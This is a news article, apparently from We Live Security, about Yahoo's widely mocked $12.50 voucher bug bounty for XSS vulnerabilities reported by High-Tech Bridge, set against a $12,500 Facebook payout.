Finding vulnerabilities can be a profitable business – even if you work for the right side of the law. Last month, Facebook paid out $12,500 to a researcher for finding a bug – this month, Yahoo! paid out $12.50.
Yahoo!’s more modest “Bug Bounty” was not even paid in money – it came in the form of vouchers for Yahoo!’s corporate store, where fans can buy purple hats, T-shirts, and a desk toy that yodels “Yahoo!” The payout has been widely mocked, according to The Inquirer.
Many companies – including internet giants such as Google and Mozilla – rely on “bug bounty” programmes as a cost-effective way of finding flaws. Most researchers don’t earn the equivalent of a salary – but the thought of a “big” bounty keeps people interested, according to a recent UC Berkeley study.
But Yahoo’s bounties don’t offer much of an incentive, says Ilia Kolochenko, CEO of Swiss firm High-Tech Bridge. Kolochenko claims that he and his team decided to “test” Yahoo’s programme by sending in vulnerabilities – but that their first was rejected as “not new”, having already been reported by another researcher.
“By Monday the 23rd of September the Yahoo Security Team was notified of 3 more XSS vulnerabilities affecting the ecom.yahoo.com and adserver.yahoo.com domains. Each of the discovered vulnerabilities allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her clicking on it,” Kolochenko says.
“This time Yahoo took 48 hours to reply only about two XSS affecting adserver.yahoo.com. Yahoo warmly thanked us for reporting the vulnerabilities and offered us… 12.50 USD (twelve dollars and fifty cents) reward per one vulnerability. Moreover, this sum was given as a discount code.”
Kolochenko, says: “Yahoo should probably revise their relations with security researchers. Paying several dollars per vulnerability is a bad joke and won’t motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price.“
Yahoo has recently come under fire for bad security practice in recycling old email addresses – with “new” users complaining of receiving personal emails intended for the old owners - including wedding invitations.
Last month, a bug which allowed any Facebook user to delete photos from any other user’s page without their knowledge has earned its discoverer $12,500 under Facebook’s “bug bounty” program – more than 10 times the average payout.
Arul Kumar, 21, demonstrated the bug in a video where he almost – but not quite – deleted a video from Mark Zuckberberg’s photo page.
Author Rob Waugh, We Live Security